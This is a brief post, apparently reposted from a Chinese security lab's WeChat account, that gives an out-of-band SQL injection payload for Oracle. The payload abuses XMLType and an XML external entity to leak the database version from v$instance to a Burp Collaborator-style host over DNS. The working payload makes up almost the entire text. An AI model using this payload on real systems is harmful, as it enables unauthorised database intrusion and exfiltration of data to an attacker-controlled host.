Version Payload :
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vapot SYSTEM "'||(select version from v$instance)||'Burp/">%vapot;]>'),'/l') from dual)
原文始发于微信公众号(Khan安全攻防实验室):通过Burp使用DNS协作器进行的带外SQL攻击